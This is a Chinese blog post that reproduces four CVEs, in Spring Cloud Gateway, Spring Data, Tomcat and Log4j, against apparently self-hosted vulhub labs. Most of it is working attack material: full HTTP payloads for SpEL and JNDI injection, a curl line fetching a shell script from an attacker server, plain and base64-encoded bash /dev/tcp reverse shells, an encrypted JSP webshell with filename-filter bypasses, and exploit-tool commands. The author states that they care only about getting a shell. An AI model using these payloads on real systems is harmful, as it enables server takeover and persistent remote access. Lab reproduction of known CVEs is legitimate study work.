【web安全】CVE漏洞复现

已于 2024-03-02 23:43:29 修改
阅读量694 收藏 14
点赞数 9
分类专栏: web安全 文章标签: java spring boot 后端
于 2023-11-22 16:38:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46301214/article/details/134556269
版权

Spring 漏洞

【CVE-2022-22947】Spring Cloud Gateway 远程代码执行漏洞

天命:照旧,不研究漏洞点, 只管getshell

三个POC即可命令执行

Bug1:请求头:Content-Length 这行不用写,发送的时候burp会自己加上去

Bug2:请求体可能要换两行,或删除多余空格才能正常发送,反正自己多试试不同的形式,POC是没错的,只是格式有点奇怪 

【第一个POC】里面的whoami命令就是命令执行,自行换命令即可

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 114.132.96.157:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 		Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json



{
  "id": "hacktest",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}

第二个POC,打过去完事,没有东西回显的

POST /actuator/gateway/refresh HTTP/1.1
Host: 114.132.96.157:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

第三个POC,有回显的,就是第一个POC的命令的执行回显

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 114.132.96.157:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

那个root就是回显,你用ls命令显示得更明显

【CVE-2018-1273】springboot漏洞 - RCE

SpringBoot版本是:SpringBoot 1.2.0.RELEASE

也可能是:SpringBoot版本为2.0.0.RELEASE

特点:无回显触发RCE

先扫路径:/users

存在路径后,随便输入点东西,然后抓包

POST /users?page=&size=5 HTTP/1.1
Host: 43.136.101.245:40003
Content-Length: 160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://43.136.101.245:40003
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://43.136.101.245:40003/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令")]=&password=&repeatedPassword=

POC:篡改post传参的输入命令即可触发RCE

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令")]=&password=&repeatedPassword=

此漏洞不能直接反弹shell,需要先下载反弹shell文件,然后执行shell文件

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl -o /tmp/bash.sh http://43.136.101.245:81/shell.sh")]=&password=&repeatedPassword=
// POC 里面执行的命令
curl -o /tmp/bash.sh http://43.136.101.245:81/shell.sh
// shell.sh 文件里面的反弹shell命令
bash -c "bash -i >& /dev/tcp/43.136.101.245/7777 0>&1"

当然了使用curl下载前,你需要先搭建一个web服务器,然后上传好shell文件

服务器回显500的状态码,表示成功

云服务器开启端口监听,然后执行一下文件即可

Tomcat 漏洞

【CVE-2017-12615】Tomcat漏洞 - upload

通过云服务器+docker+vulhub搭建的靶场,打开后是默认页面

访问根目录,抓取重放模块

抓包,把GET改成PUT请求,在冰鞋那里生成木马,并粘贴进去

代码如下,记得删除里面自带的中文注释

<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
private byte[] Decrypt(byte[] data) throws Exception
{
     byte[] decodebs;
        Class baseCls ;
                try{
                    baseCls=Class.forName("java.util.Base64");
                    Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null);
                    decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data});
                }
                catch (Throwable e)
                {
                    baseCls = Class.forName("sun.misc.BASE64Decoder");
                    Object Decoder=baseCls.newInstance();
                    decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)});

                }
    String key="e45e329feb5d925b";
	for (int i = 0; i < decodebs.length; i++) {
		decodebs[i] = (byte) ((decodebs[i]) ^ (key.getBytes()[i + 1 & 15]));
	}
	return decodebs;
}
%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return
        super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            byte[] buf = new byte[512];
            int length=request.getInputStream().read(buf);
            while (length>0)
            {
                byte[] data= Arrays.copyOfRange(buf,0,length);
                bos.write(data);
                length=request.getInputStream().read(buf);
            }
            out.clear();
            out=pageContext.pushBody();
        new U(this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext);}
%>

放入数据包中,并发送201是成功

这里文件名是禁止 jsp 上传的所以需要绕过,

有三种方法: 文件名后斜杠 或 %20或 ::$DATA

我这里用了斜杠

使用冰蝎连接,记得选择加密方式,我就是没选择加密方式卡了一晚上

getshell成功

 

log4j 漏洞
 

【CVE-2021-44228】Log4j2 核弹级漏洞
 

 
 
天命:阿里安全团队发现的核弹级漏洞
 
 
天命:原理就不讲了,我也是一知半懂
 

 

在vulhub进入log4j目录,拉去镜像,用docker-compose启动
 

 

步骤一:先探测是否有漏洞
 

先去dnslog拿一个域名,现在网站更新为:https://dnslog.org/
 

 

在这个目录下可以传一个参数,把JNDI注入放进去,放自己拿到的域名上去
 

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.b6c00a42.dnslog.store} HTTP/1.1
Host: 43.136.101.245:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
 

回显是不会出现任何东西的
 

 

记录在dnslog那里,查看一下记录就会发现,有漏洞,并且返回了java的版本信息
 

 

 

步骤二:Getshell
 

先下载工具:https://link.csdn.net/?target=https%3A%2F%2Fwww.lanzouy.com%2FiLyJTxlpxli
 

把工具先上传到云服务器(这次我们用真机云服务器进行反弹shell,虽然靶场跟攻击机都是同一个服务器,不过也不影响)
 

然后再构造payload:bash -i >& /dev/tcp/43.136.101.245/7777 0>&1
 

转一下编码,加上点东西,最后变成这样
 

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzYuMTAxLjI0NS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}
 

可以使用在线直接生成的网站:https://ares-x.com/tools/runtime-exec
 

 

效果还是很屌的。
 

然后来到服务器,先用一下命令开启工具(注意:JDK必须1.8版本)
 

【样例讲解】
java -jar JNDI-Injection-Exploit-1.0--SHOT-all.jar -C "刚刚生成的payload" -A "攻击机的IP地址"

【实例】
java -jar JNDI-Injection-Exploit-1.0--SHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzYuMTAxLjI0NS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A "43.136.101.245"
 

 

选一个exp放入请求,直接请求即可
 

发送数据包前先打开攻击机的端口监听,因为工具会反弹shell过来
 

我这里payload是监听7777端口:nc -lvnp 7777
 

然后发送数据包攻击,就会反弹shell到攻击机的端口
 

攻击数据包如下,响应400也不用管,是正常的
 

GET /solr/admin/cores?action=${jndi:rmi://43.136.101.245:1099/8hwvbv} HTTP/1.1
Host: 43.136.101.245:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

然后攻击机接收到反弹shell成功
 

 

 

 

 

 

 

 


                

        

        

    

  


    

      

        

            

              
                
                  星盾网安
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
web渗透测试漏洞复现:ZooKeeper未授权漏洞复现

				
			

			

				

					HACKONE的博客
				

				

					03-30
					
					1193
					
				

			

		

		

			
				
ZooKeeper 是一个分布式的、开源的协调服务,最初由雅虎开发,现隶属于 Apache 软件基金会,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件,旨在为大型分布式系统提供一致性的服务。ZooKeeper 的设计目的是简化分布式应用程序的开发和维护,它通过提供一组简单易用的原语和数据模型,为分布式系统中的进程提供协作服务。

			
		

	



                

            
              



	

		

			

				
					
CVE-2021-41773漏洞复现

				
			

			

				

					Aquarius_ego的博客
				

				

					03-24
					
					1509
					
				

			

		

		

			
				
CVE-2021-41773漏洞复现

			
		

	



              


  
              

                


	

		

			

				
					
CVE-2021-41773&&CVE-2021-42013复现

				
			

			

				

					weixin_42345596的博客
				

				

					10-09
					
					4914
					
				

			

		

		

			
				
CVE-2021-41773
漏洞原理
Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。在其 2.4.49 版本中,引入了一个路径体验,满足下面两个条件的 Apache 服务器将受到影响:

版本等于2.4.49
<Directory />Require all granted</Directory>(默认情况下是允许被访问的)。

攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在

			
		

	





	

		

			

				
					
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复

					
最新发布

				
			

			

				

					baimao__Ch的博客
				

				

					09-18
					
					998
					
				

			

		

		

			
				
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)

			
		

	



		

			
		



	

		

			

				
					
【网络安全CVE漏洞分析以及复现

				
			

			

				

					Android_wxf的博客
				

				

					04-21
					
					1830
					
				

			

		

		

			
				
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。

			
		

	





	

		

			

				
					
CVE漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞

				
			

			

				

					把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
				

				

					04-27
					
					747
					
				

			

		

		

			
				
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。进入MSF框架,search  CVE-2014-3120,然后进入对应模块,设置好参数即可攻击。本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场。检测环境端口是否开放。

			
		

	





	

		

			

				
					
两个CVE漏洞复现

				
			

			

				

					qq_44704184的博客
				

				

					07-14
					
					2399
					
				

			

		

		

			
				
简单复现两个漏洞

			
		

	





	

		

			

				
					
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

				
			

			

				

					ran的博客
				

				

					05-13
					
					2863
					
				

			

		

		

			
				
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。

			
		

	





	

		

			

				
					
中间件安全-CVE漏洞复现-Docker+Websphere+Jetty

				
			

			

				

					xiaoheizi的博客
				

				

					07-15
					
					626
					
				

			

		

		

			
				
如果拿下的shell是docker容器的,就要进行docker逃逸来获取宿主机shell,因为在docker容器执行命令影响不到宿主机。Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://目标ip:端口/%u002e/WEB-INF/web.xml。信息泄露路径:http://目标ip:端口/%2e/WEB-INF/web.xml。

			
		

	





	

		

			

				
					
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现

				
			

			

				

					zz12345600354的博客
				

				

					04-26
					
					756
					
				

			

		

		

			
				
目录

服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP

* 概述


PHP-开发框架安全-Thinkphp&Laravel

  * 漏洞复现



    * Thinkphp-3.X RCE


Thinkphp-5.X RCE
Laravel框架安全问题- CVE-2021-3129 RCE




JAVAWEB-开发框架安全-Spring&Struts2

  * Struts2框架安全



			
		

	





	

		

			

				
					
漏洞复现】Cisco IOS XE Web UI-权限提升漏洞(CVE-2023-20198)

				
			

			

				

					知黑而守白
				

				

					06-20
					
					207
					
				

			

		

		

			
				
Cisco IOS XE Web UI 权限提升漏洞(CVE-2023-20198),当Cisco IOS XE Web UI在互联网公开时,恶意攻击者可能会利用此漏洞添加具有15级访问权限的账户,使服器处于继不安全的状态。Cisco IOS XE是思科公司的一种网络操作系统,提供了用于管理和配置网络设备的用户界面。其中,Web UI是一种通过Web浏览器访问的用户界面,允许管理员轻松地配置和管理路由器和交换机等网络设备。影响范围:启用了Web UI功能的Cisco IOS XE。

			
		

	





	

		

			

				
					
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程

				
			

			

				

					W小哥
				

				

					10-14
					
					3780
					
				

			

		

		

			
				
一、漏洞描述
Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
二、影响版本
Apache 2.4.49 和 Apache 2.4.50
三、靶场准备
本实验使用vulhub环境,节约搭建时间
mkdir Docker

			
		

	





	

		

			

				
					
CVE-2021-42013 漏洞复现

				
			

			

				

					爱吃仡坨的Blog
				

				

					10-13
					
					595
					
				

			

		

		

			
				
Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越,但是由于在请求处理过程中,还会调用ap_unescape_url函数对参数再次进行解码,使得需进行两次解码,但即使这样仍然会导致路径穿越。

			
		

	





	

		

			

				
					
CVE-2021-41773 漏洞复现

				
			

			

				

					爱吃仡坨的Blog
				

				

					10-13
					
					676
					
				

			

		

		

			
				
Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../的路径穿越符当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在../。

			
		

	





	

		

			

				
					
PHP-FPM远程命令执行 CVE-2019-11043 漏洞复现

				
			

			

				

					ADummy的博客
				

				

					02-26
					
					225
					
				

			

		

		

			
				
PHP-FPM远程命令执行(CVE-2019-11043)
by ADummy
0x00利用路线
​			安装go环境—>下载利用工具—>写入shell—>getshell
0x01漏洞介绍
​		漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_

			
		

	





	

		

			

				
					
[漏洞复现]CVE-2020-1938漏洞复现

				
			

			

				

					cj_Hydra's Blog
				

				

					03-30
					
					2498
					
				

			

		

		

			
				
前言:
漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。
影响版本:
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0....

			
		

	





	

		

			

				
					
CVE-2017-17405漏洞复现

				
			

			

				

					weixin_44253823的博客
				

				

					11-05
					
					1123
					
				

			

		

		

			
				
Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

启动docker


service docker start

在Vulhub中加载CVE-2017-14015漏洞环境。


cd vulhub/ru...

			
		

	





	

		

			

				
					
漏洞重现:学习编程并进行CVE漏洞复现

				
			

			

				

					ByteCodN的博客
				

				

					09-18
					
					441
					
				

			

		

		

			
				
漏洞复现是指通过编写代码或使用特定的工具来模拟和重现已知的漏洞,以便深入研究漏洞的原理和影响,并为其修复提供参考。编程是一项需要不断实践和探索的技能,通过不断学习和实践,我们可以提高自己在编程和漏洞复现方面的技能。首先,让我们选择一个CVE漏洞复现。为了使漏洞复现更具挑战性和有意义,我们可以尝试修改代码,使其更接近真实环境中的漏洞利用场景。请注意,在实际的漏洞复现过程中,我们需要更详细和复杂的代码来模拟真实的漏洞条件。请注意,这里的代码只是一个示例,实际的CVE漏洞复现可能需要更多的工作和技术细节。

			
		

	





	

		

			

				
					
Windows CVE-2022-21907漏洞复现

				
			

			

				

					qq_53579360的博客
				

				

					11-13
					
					2008
					
				

			

		

		

			
				
漏洞复现

			
		

	





	

		

			

				
					
cve-2015-1635漏洞复现

				
			

			

				

					07-28
				

			

		

		

			
				
你好!对于CVE-2015-1635漏洞复现,首先需要明确这是一个远程代码执行漏洞,也被称为HTTP.sys远程代码执行漏洞。该漏洞存在于Microsoft Windows系统的HTTP协议堆栈中。

复现漏洞的一种方法是发送特制的HTTP请求来触发漏洞,并执行恶意代码。以下是一个简单的Python示例代码,用于发送恶意请求:

```python
import requests

url = "http://目标IP地址/"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
    'Accept-Language': 'en-US,en;q=0.5',
    'Connection': 'close',
    'Content-Length': '18446744073709551615',
    'Host': '目标IP地址'
}

response = requests.get(url, headers=headers)
print(response.text)
```

在代码中,将`目标IP地址`替换为目标服务器的IP地址。这个请求会发送一个特殊长度的`Content-Length`头部字段,触发远程执行漏洞。

请注意,这个示例只是为了说明漏洞的原理,实际应用中需要谨慎操作并确保遵守法律法规。建议在合法授权和测试环境中进行漏洞测试,以维护网络安全。

如果你需要更详细的复现步骤或其他安全问题,请提供更多细节,我将尽力帮助你。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
星盾网安

			
能花钱买到的知识,都不贵

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值